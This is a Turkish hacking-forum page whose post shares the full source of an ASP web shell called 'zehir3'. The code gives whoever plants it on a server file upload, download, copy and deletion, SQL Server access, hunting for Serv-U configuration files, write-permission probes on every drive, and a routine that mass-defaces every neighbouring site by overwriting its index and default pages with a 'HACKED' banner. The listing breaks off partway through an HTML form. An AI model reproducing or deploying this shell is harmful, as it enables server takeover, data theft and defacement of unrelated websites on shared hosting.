Ana Sayfa
Yardım
Ara
Hizli Arama
Gelismis Arama
[Kapat]
Takvim
Üyeler
Giriş Yap
Kayıt
HoşGeldin Ziyretçi, Lütfen
Giriş Yap
ya da
Üye Ol
Ip Adresiniz: 38.107.179.241
Username:
1 Saat
1 Gün
1 Hafta
1 Ay
Her zaman
Password:
04.02.2012 tarihi itibariyle tüm yetkililerin yetkileri alınmış olup
Yeni Yönetim Ekibi oluşturulması ile ilgili konu için tıklayın :
WwW.HacKbanK.Gen.TR
HACK , HACKER , HACKED , HACKING , GÜVENLİK , GÜVENLİK AÇIKLARI , EXPLOIT, SHELL
GÜVENLİK AÇIKLARI
Zehir (4) Text
Sayfa: [
1
]
Aşağı git
« önceki
sonraki »
Gönderen
Konu: Zehir (4) Text (Okunma Sayısı 635 defa)
0 Üye ve 1 Ziyaretçi konuyu incelemekte.
MuratbanK'in HacKbanK Bilgileri
MuratbanK
MuratbanK
HacKbanKlının Profilini Goster
Ozel Mesaj Gonder
Son Mesajlarını Goster
Arkadas Listeme Ekle
кαяαηℓιктαкi göякєmℓi ιşιğιηιz
¼ ™ ѕιтє кυяυ©υѕυ © ¾
ωєвмαѕтєя üує
HacKbanK lıya Ozgu Mesajı
™ кαяαmuяαтвαηк © тєкєℓуєηιяαкı=нαуαт ρєєн
Cinsiyeti
Uye Numarası (ID)
1
HacKbanK a Kayıt Tarihi
Temmuz 13, 2007, 03:26:51 ÖS
Nerden
тєкєℓуєηιяαкıηıη σℓ∂υgυ нєянαηgι вιя çιℓιηgιя ѕσƒяαѕıη∂αη
HacKbanKlının Yası: 30
HacKbanK taki Mesaj Sayısı
21624
HacKbanK Rep Puanı
Rep Puanı: 19749
Deneyimleri
Aktiflik
Deneyim
Seviye
HıyarlıK
HacKbanK Tecrubeleri
Paylasım
Guc/Power
Ukalalık
Tehlike Duzeyi
Iletisim Bilgileri
Ruh Halim:
Zehir (4) Text
«
:
Temmuz 27, 2007, 09:25:54 ÖS »
Zehir (4) Text
KOD:
Kod:
<%
mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
if Request("kuskapani")=1 then
Response.End
end if
if Request("kuskapani")=2 then
on error resume next
path = Request("path")
sFolder = Request("SubFolder")
fName = Request("FileName")
d1 = Request("dosya1")
d2 = Request("dosya2")
d3 = Request("dosya3")
d4 = Request("dosya4")
bg__ = Request.Form("selectColour")
if bg__ = "0" then bg__ = "#ffffff"
byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>HACKED " & Session("n2") & "3 ;)</font>"
sFolder = Replace(sFolder,"/","\")
if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
Set f = objFSO.GetFolder(Path)
Set fc = f.SubFolders
h__ = 0
f__ = 0
ss__ = now
For Each f1 In fc
hedef_ = replace(f1.path,"/","\")
if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
hedef__ = left(hedef_,len(hedef_)-1)
folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
if d1<>"" then d1 = true
if d2<>"" then d2 = true
if d3<>"" then d3 = true
if d4<>"" then d4 = true
on error goto 0:on error resume next
if fName<>"" then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
MyFile.write byMesaj
end if
if d1 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
MyFile.write byMesaj
end if
if d2 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True)
MyFile.write byMesaj
end if
if d3 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True)
MyFile.write byMesaj
end if
if d4 then
Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True)
MyFile.write byMesaj
end if
if err<>0 then
response.Write folderName_ & " <font color=red>[FAILED!]</font><br>"
f__ = f__ + 1
else
response.Write folderName_ & " <font color=blue>[HACKED]</font><br>"
h__ = h__ + 1
end if
Next
ss___ = now
response.Write "<br><font color=white>by zehir!...</font><br><b>Sonuc : </b> Toplam Sьre : "&left(ss__-ss___,5)&"sn. ;)<br><font color=blue>Hacked</font> = "&h__&"<br><font color=red>Failed</font> = "&f__
response.End
end if
status = Request("status")
path = Request("path")
dPath = Request("dPath")
arama = Request("txArama")
dkayit = Request("dkayit")
table = Request("table")
del = Request("del")
islem = Request("islem")
strSQL = Request("strSQL")
cf = Request("cf")
pathfile = request("pathfile")
if path="" then path=request.servervariables("APPL_PHYSICAL_PATH")
if status="" then status=2
popup = true
'////////////////////////////////
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
Response.Buffer=True
Set Fil = objFSO.GetFile(pathfile)
Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader "Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.End()
end if
'//////////////////////////////////
if status="-4" then popup=false
if status="13" then popup=false
if status="14" then popup=false
if status="15" then popup=false
if status="16" then popup=false
if status="17" then popup=false
if status="18" then popup=false
if status="19" then popup=false
if status="33" then popup=false
if status="40" then popup=false
if status="50" then popup=false
byMsg = request.QueryString("byMsg")
if byMsg<>"" then response.Write byMsg
response.Write "<title>zehir3 --> powered by Kruis <Admin@spygrup.org></title>"
if popup then
%>
<center>
<a href="<%=dosyaPath%>?mevla=1&status=13" onclick="sistemBilgisi(this.href);return false;">System Info</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=40" onclick="sistemTest(this.href);return false;">System Test</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
<font color=yellow> | </font>
<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
<script language=javascript>
function sistemBilgisi(yol){
NewWindow(yol,"",600,240,"no");
}
function SitelerTestte(yol){
NewWindow(yol,"",530,420,"no");
}
function klasorIslemleri(yol){
NewWindow(yol,"",400,280,"no");
}
function sqlServer(yol){
NewWindow(yol,"",300,50,"no");
}
function poweredby(yol){
NewWindow(yol,"",300,50,"no");
}
function sistemTest(yol){
NewWindow(yol,"",400,300,"no");
}
</script>
<%
end if
'####################################
Class clsUpload
Private mbinData
Private mlngChunkIndex
Private mlngBytesReceived
Private mstrDelimiter
Private CR
Private LF
Private CRLF
Private mobjFieldAry()
Private mlngCount
Private Sub RequestData
Dim llngLength
mlngBytesReceived = Request.TotalBytes
mbinData = Request.BinaryRead(mlngBytesReceived)
End Sub
Private Sub ParseDelimiter()
mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
End Sub
Private Sub ParseData()
Dim llngStart
Dim llngLength
Dim llngEnd
Dim lbinChunk
llngStart = 1
llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
While Not llngStart = 0
llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
llngLength = llngEnd - llngStart
lbinChunk = MidB(mbinData, llngStart, llngLength)
Call ParseChunk(lbinChunk)
llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
Wend
End Sub
Private Sub ParseChunk(ByRef pbinChunk)
Dim lstrName
Dim lstrFileName
Dim lstrContentType
Dim lbinData
Dim lstrDisposition
Dim lstrValue
lstrDisposition = ParseDisposition(pbinChunk)
lstrName = ParseName(lstrDisposition)
lstrFileName = ParseFileName(lstrDisposition)
lstrContentType = ParseContentType(pbinChunk)
If lstrContentType = "" Then
lstrValue = CStrU(ParseBinaryData(pbinChunk))
Else
lbinData = ParseBinaryData(pbinChunk)
End If
Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
End Sub
Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
Dim lobjField
ReDim Preserve mobjFieldAry(mlngCount)
Set lobjField = New clsField
lobjField.Name = pstrName
lobjField.FilePath = pstrFileName
lobjField.ContentType = pstrContentType
If LenB(pbinData) = 0 Then
lobjField.BinaryData = ChrB(0)
lobjField.Value = pstrValue
lobjField.Length = Len(pstrValue)
Else
lobjField.BinaryData = pbinData
lobjField.Length = LenB(pbinData)
lobjField.Value = ""
End If
Set mobjFieldAry(mlngCount) = lobjField
mlngCount = mlngCount + 1
End Sub
Private Function ParseBinaryData(ByRef pbinChunk)
Dim llngStart
llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
If llngStart = 0 Then Exit Function
llngStart = llngStart + 4
ParseBinaryData = MidB(pbinChunk, llngStart)
End Function
Private Function ParseContentType(ByRef pbinChunk)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 15
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
End Function
Private Function ParseDisposition(ByRef pbinChunk)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 22
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
End Function
Private Function ParseName(ByRef pstrDisposition)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStr(llngStart + 6, pstrDisposition, """")
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 6
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseName = Mid(pstrDisposition, llngStart, llngLength)
End Function
' ------------------------------------------------------------------------------
Private Function ParseFileName(ByRef pstrDisposition)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStr(llngStart + 10, pstrDisposition, """")
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 10
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
End Function
Public Property Get Count()
Count = mlngCount
End Property
Public Default Property Get Fields(ByVal pstrName)
Dim llngIndex
If IsNumeric(pstrName) Then
llngIndex = CLng(pstrName)
If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
Exit Property
End If
Set Fields = mobjFieldAry(pstrName)
Else
pstrName = LCase(pstrname)
For llngIndex = 0 To mlngCount - 1
If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
Set Fields = mobjFieldAry(llngIndex)
Exit Property
End If
Next
End If
Set Fields = New clsField
End Property
Private Sub Class_Terminate()
Dim llngIndex
For llngIndex = 0 To mlngCount - 1
Set mobjFieldAry(llngIndex) = Nothing
Next
ReDim mobjFieldAry(-1)
End Sub
Private Sub Class_Initialize()
ReDim mobjFieldAry(-1)
CR = ChrB(Asc(vbCr))
LF = ChrB(Asc(vbLf))
CRLF = CR & LF
mlngCount = 0
Call RequestData
Call ParseDelimiter()
Call ParseData
End Sub
Private Function CStrU(ByRef pstrANSI)
Dim llngLength
Dim llngIndex
llngLength = LenB(pstrANSI)
For llngIndex = 1 To llngLength
CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
Next
End Function
Private Function CStrB(ByRef pstrUnicode)
Dim llngLength
Dim llngIndex
llngLength = Len(pstrUnicode)
For llngIndex = 1 To llngLength
CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
Next
End Function
End Class
'####################################
Session("n1") = "by Ejder"
Class clsField
Public Name
Private mstrPath
Public FileDir
Public FileExt
Public FileName
Public ContentType
Public Value
Public BinaryData
Public Length
Private mstrText
Public Property Get BLOB()
BLOB = BinaryData
End Property
Public Function BinaryAsText()
Dim lbinBytes
Dim lobjRs
If Length = 0 Then Exit Function
If LenB(BinaryData) = 0 Then Exit Function
If Not Len(mstrText) = 0 Then
BinaryAsText = mstrText
Exit Function
End If
lbinBytes = ASCII2Bytes(BinaryData)
mstrText = Bytes2Unicode(lbinBytes)
BinaryAsText = mstrText
End Function
Public Sub SaveAs(ByRef pstrFileName)
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim lobjStream
Dim lobjRs
Dim lbinBytes
If Length = 0 Then Exit Sub
If LenB(BinaryData) = 0 Then Exit Sub
Set lobjStream = Server.CreateObject("ADODB.Stream")
lobjStream.Type = adTypeBinary
Call lobjStream.Open()
lbinBytes = ASCII2Bytes(BinaryData)
Call lobjStream.Write(lbinBytes)
On Error Resume Next
Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
'if err<>0 then response.Write "<br>"&err.Description
Call lobjStream.Close()
Set lobjStream = Nothing
End Sub
Public Property Let FilePath(ByRef pstrPath)
mstrPath = pstrPath
If Not InStrRev(pstrPath, ".") = 0 Then
FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
FileExt = UCase(FileExt)
End If
If Not InStrRev(pstrPath, "\") = 0 Then
FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
End If
If Not InStrRev(pstrPath, "\") = 0 Then
FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
End If
End Property
Public Property Get FilePath()
FilePath = mstrPath
End Property
private Function ASCII2Bytes(ByRef pbinBinaryData)
Const adLongVarBinary=205
Dim lobjRs
Dim llngLength
Dim lbinBuffer
llngLength = LenB(pbinBinaryData)
Set lobjRs = Server.CreateObject("ADODB.Recordset")
Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
Call lobjRs.Open()
Call lobjRs.AddNew()
Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
Call lobjRs.Update()
lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
Call lobjRs.Close()
Set lobjRs = Nothing
ASCII2Bytes = lbinBuffer
End Function
Private Function Bytes2Unicode(ByRef pbinBytes)
Dim lobjRs
Dim llngLength
Dim lstrBuffer
llngLength = LenB(pbinBytes)
Set lobjRs = Server.CreateObject("ADODB.Recordset")
Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
Call lobjRs.Open()
Call lobjRs.AddNew()
Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
Call lobjRs.Update()
lstrBuffer = lobjRs.Fields("BinaryData").Value
Call lobjRs.Close()
Set lobjRs = Nothing
Bytes2Unicode = lstrBuffer
End Function
End Class
Session("n2") = "EJDER"
'####################################
function addslash(path)
if right(path,1)="\" then addslash=path else addslash=path & "\"
end function
sub Upload()
dim objUpload,f,max,i,name,path,size,success
set objUpload=New clsUpload
targetPath=objUpload.Fields("folder").Value
max=objUpload.Fields("max").Value
for i=1 to max
name=objUpload.Fields("file" & i).FileName
size=objUpload.Fields("file" & i).Length
if (name<>"") and (size>0) then
gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
path=addslash(targetPath) & name
objUpload.Fields("file" & i).SaveAs path
if objFSO.FileExists(path) then
on error resume next
set f=objFSO.GetFile(path)
if IsObject(f) then
if f.Size=size then success=true else success=false
end if
set f=nothing
end if
if success then gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
end if
next
response.Write gMsg
set objUpload=nothing
end sub
if status="-4" then
Upload()
' hataKontrol
popup=false
end if
'////////////////////////////////
sub hataKontrol
if err<>0 then
Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
end if
end sub
sub araBul(path_,ara_)
on error resume next
If Len(path_) > 0 Then
cur = path_&"\"
If cur = "\\" Then cur = ""
parent = ""
If InStrRev(cur,"\") > 0 Then
parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
End If
Else
cur = ""
End If
Set f = objFSO.GetFolder(cur)
Set fc = f.Files
For Each f1 In fc
if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Н</a></font>"
if lcase(ara_)="mdb" then
Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>ы</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
else
Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>ы</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
end if
end if
Next
Set fs = f.SubFolders
For Each f1 In fs
araBul f1.path,ara_
Next
Set f = Nothing
Set fc = Nothing
Set fs = Nothing
end sub
sub sistemTest
response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuз</td></tr>"
servu_Test
WriteTestOnDriver
WriteTestOnLocalPath
LocalPathParentFolder
LocalPathPParentFolder
response.Write "</table>"
end sub
sub servu_Test
dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
for each drive_ in objFSO.Drives
if drive_.Drivetype=2 or drive_.Drivetype=3 then
for each d_ in dosya_
d_ = drive_.DriveLetter&":\"&d_
if objFSO.FileExists(d_) then
response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
end if
next
end if
next
end sub
function yaziyomu(yol)
on error goto 0:on error resume next
dim sonuc__
Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
MyFile.write "Kruis <admin@spygrup.org>"
set MyFile = Nothing
if err<>0 then
sonuc__="<font color=red>Yazma Hakkэ Yok!</font>"
else
sonuc__="<font color=yellow>Yazma Hakkэ Var!</font>"
on error goto 0: on error resume next
objFSO.DeleteFile yol & "\test.zehir",true
if err<>0 then
sonuc__=sonuc__&"<br><font color=red>Silme Hakkэ Yok!</font>"
else
sonuc__=sonuc__&"<br><font color=yellow>Silme Hakkэ Var!</font>"
end if
end if
yaziyomu = sonuc__
end function
function yaziyomu2(yol)
on error goto 0:on error resume next
Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
MyFile.write "Kruis <admin@spygrup.org>"
set MyFile = Nothing
if err<>0 then
yaziyomu2 = false
else
objFSO.DeleteFile yol & "\test.zehir"
yaziyomu2 = true
end if
end function
sub WriteTestOnDriver
for each drive_ in objFSO.Drives
if drive_.Drivetype=2 or drive_.Drivetype=3 then
if not yaziyomu2(drive_.DriveLetter&":\") then
Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
else
Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
end if
end if
next
end sub
sub WriteTestOnLocalPath
on error goto 0
on error resume next
if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
else
Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
end if
end sub
sub LocalPathParentFolder
on error goto 0
on error resume next
hed_ = request.servervariables("APPL_PHYSICAL_PATH")
if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
parhed_ = left(hed_,InStrRev(hed_,"\"))
Set f = objFSO.GetFolder(parhed_)
Set fc = f.SubFolders
int_fol=0
int_fil=0
For Each f1 In fc
int_fol=int_fol+1
Next
Set fc = f.files
For Each f1 In fc
int_fil=int_fil+1
Next
if err<>0 then
Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluюtu : ["&err.Description&"]</td></tr>"
else
Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
end if
end sub
sub LocalPathPParentFolder
on error goto 0
on error resume next
hed_ = request.servervariables("APPL_PHYSICAL_PATH")
if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
hed_ = left(hed_,InStrRev(hed_,"\"))
if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
parhed_ = left(hed_,InStrRev(hed_,"\"))
Set f = objFSO.GetFolder(parhed_)
Set fc = f.SubFolders
int_fol=0
int_fil=0
For Each f1 In fc
int_fol=int_fol+1
Next
Set fc = f.files
For Each f1 In fc
int_fil=int_fil+1
Next
if err<>0 then
if err=451 then
Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Ьst Klasor Yok :)</td></tr>"
else
Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluюtu : ["&err.Description&"]</td></tr>"
end if
else
Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
end if
end sub
SELECT CASE status
CASE 13 'Sistem Bilgisi
Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
Response.Write "</table>"
popup = false
CASE 14 'Upload and Search
aramaUpload
popup = false
hataKontrol
CASE 15 'Ms. SQL Server
Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server iзin connection string giriniz</td></tr><tr><td align=center>"
Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='' name=path><br>"
response.Write "<input type=submit value='SQL Servera Baрlan' style='height:23;width:170' id=submit1 name=submit1>"
Response.Write "</td></tr></table>"
response.Write "</form>"
popup = false
hataKontrol
CASE 16 'file Copy window
Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
response.Write "<input type=radio name='islem' value='tasi'>Tasi"
response.Write "</table>"
response.Write "</form>"
popup = false
hataKontrol
CASE 17 'file Copy
isl = ""
if islem="kopyala" then
objFSO.CopyFile path,cf
isl="kopyalandэ.."
elseif islem="tasi" then
objFSO.MoveFile path,cf
isl="taюэndэ.."
end if
response.Write "Dosya "&isl
response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
response.Write "<br>"
popup = false
hataKontrol
CASE 18 'folder Copy window
Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
response.Write "<input type=radio name='islem' value='tasi'>Tasi"
response.Write "</table>"
response.Write "</form>"
popup = false
hataKontrol
CASE 19 'folder Copy
isl = ""
if islem="kopyala" then
objFSO.CopyFolder path,cf
isl="kopyalandэ.."
elseif islem="tasi" then
objFSO.MoveFolder path,cf
isl="taюэndэ.."
end if
response.Write "Klasor "&isl
response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
response.Write "<br>"
popup = false
hataKontrol
CASE 33 'Powered By
response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by YaduriS"
response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>YaduriS@SpyGrup.Org<br><font color=yellow face='courier new'>kьllь nefsun zaifetun mevt"
popup = false
hataKontrol
CASE 40 'Sistem Test
sistemTest
popup=false
CASE 50 'Siteleri Test Edelim :D
%>
<table width="100%" cellpadding=0 cellspacing=0>
<tr>
<td align=center>
<b>Gьvenlik Testi - SpyGrup.Org</b><br>
<form action="<%=dosyaPath%>" method=post id=frmMesaj>
<input type=hidden name=kuskapani value=2>
<table width=500 align=center border=1 cellpadding=0 cellspacing=0>
<tr>
<td width=100>Path</td>
<td><input style="width:100%" type=text name="Path" id="Path" value="<%=path%>"></td>
</tr>
<tr>
<td width=100>Sub Folder</td>
<td><input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www"></td>
</tr>
<tr>
<td width=100>File Name</td>
<td><input style="width:100%" type=text name="FileName" id="FileName" value="byejder.txt"></td>
</tr>
<tr>
<td colspan=2>
<table width="100%" align=center>
<tr>
<td width="50%">
<input type=checkbox name="dosya1" ID="Checkbox1">index.htm<br>
<input type=checkbox name="dosya2" ID="Checkbox2">default.htm<br>
</td>
<td width="50%">
<input type=checkbox name="dosya3" ID="Checkbox3">index.asp<br>
<input type=checkbox name="dosya4" ID="Checkbox4">default.asp<br>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td colspan=2 align=center>
<a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
<a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
<a href="#" onClick="FormatText('paste')" alt="Yapэюtэr">Yapэюtэr</a>
<a href="#" alt="Kalэn" onClick="FormatText('bold', '')">Bold</a>
<a href="#" alt="Эtalic" onClick="FormatText('italic', '')">Italic</a>
<a href="#" alt="Altэ Зizili" onClick="FormatText('underline', '')">UnderLine</a>
<a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalэ">JustifyLeft</a>
<a href="#" alt="Ortada Hizalэ" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
<a href="#" onClick="FormatText('JustifyRight', '')" alt="Saрa Hizalэ">JustifyRight</a>
<a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
<a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
<select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
<option value="0" selected>-- Renk --</option>
<option value="black">Siyah</option>
<option value="white">Beyaz</option>
<option value="blue">Mavi</option>
<option value="red">Kэrmэzэ</option>
<option value="green">Yeюil</option>
<option value="yellow">Sarэ</option>
<option value="orange">Turuncu</option>
<option value="brown">Kahverengi</option>
<option value="magenta">Pembe</option>
<option value="cyan">Aзэk Mavi</option>
